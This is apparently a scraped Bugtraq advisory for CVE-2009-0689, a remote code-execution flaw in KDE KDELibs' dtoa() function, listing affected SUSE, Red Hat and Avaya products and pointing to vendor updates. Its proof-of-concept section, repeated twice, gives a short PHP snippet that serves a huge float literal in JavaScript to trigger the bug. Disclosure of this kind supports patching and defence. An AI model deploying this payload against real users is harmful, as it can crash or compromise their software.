KDE KDELibs 'dtoa()' Remote Code Execution Vulnerability
BID:37080
Info
KDE KDELibs 'dtoa()' Remote Code Execution Vulnerability
| Bugtraq ID: | 37080 |
| Class: | Boundary Condition Error |
| CVE: |
CVE-2009-0689 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 20 2009 12:00AM |
| Updated: | Apr 28 2014 12:51AM |
| Credit: | Maksymilian Arciemowicz and sp3x |
| Vulnerable: |
SuSE SUSE Linux Enterprise Server 9 SuSE SUSE Linux Enterprise Server 11 SuSE SUSE Linux Enterprise Server 10 SP3 SuSE SUSE Linux Enterprise Server 10 SP2 S.u.S.E. openSUSE 11.2 S.u.S.E. openSUSE 11.1 S.u.S.E. openSUSE 11.0 S.u.S.E. Open-Enterprise-Server 0 S.u.S.E. Novell Linux Desktop 9.0 Red Hat Enterprise Linux Long Life 5.6 server Red Hat Enterprise Linux Long Life 5.3 Server Pardus Linux 2009 0 KDE KDE 4.3.3 Avaya IP Office Application Server 8.1 Avaya IP Office Application Server 8.0 Avaya Aura Session Manager 5.2 Avaya Aura Messaging 6.1 Avaya Aura Messaging 6.0.1 Avaya Aura Messaging 6.0 Avaya Aura Communication Manager Utility Services 6.2 Avaya Aura Communication Manager Utility Services 6.1 Avaya Aura Communication Manager Utility Services 6.0 Avaya Aura Communication Manager 6.0.1 Avaya Aura Communication Manager 6.0 Avaya Aura Communication Manager 5.2 Avaya Aura Communication Manager 5.1 Avaya Aura Application Enablement Services 5.2.1 Avaya Aura Application Enablement Services 6.1.1 Avaya Aura Application Enablement Services 6.1 Avaya Aura Application Enablement Services 5.2.3 Avaya Aura Application Enablement Services 5.2.2 Avaya Aura Application Enablement Services 5.2 |
| Not Vulnerable: | |
Discussion
KDE KDELibs 'dtoa()' Remote Code Execution Vulnerability
KDE is prone to a remote code-execution vulnerability that affects KDELibs.
Successful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.
NOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.
This issue affects KDE KDELibs 4.3.3; other versions may also be affected.
KDE is prone to a remote code-execution vulnerability that affects KDELibs.
Successful exploits may allow an attacker to execute arbitrary code. Failed attacks may cause denial-of-service conditions.
NOTE: This issue is related to BID 35510 (Multiple BSD Distributions 'gdtoa/misc.c' Memory Corruption Vulnerability), but because of differences in the code base, it is being assigned its own record.
This issue affects KDE KDELibs 4.3.3; other versions may also be affected.
Exploit / POC
KDE KDELibs 'dtoa()' Remote Code Execution Vulnerability
The following proof-of-concept PHP code is available:
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
The following proof-of-concept PHP code is available:
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
Solution / Fix
KDE KDELibs 'dtoa()' Remote Code Execution Vulnerability
Solution:
Updates are available. Please see the references for more information.
Solution:
Updates are available. Please see the references for more information.
References
KDE KDELibs 'dtoa()' Remote Code Execution Vulnerability
References:
References: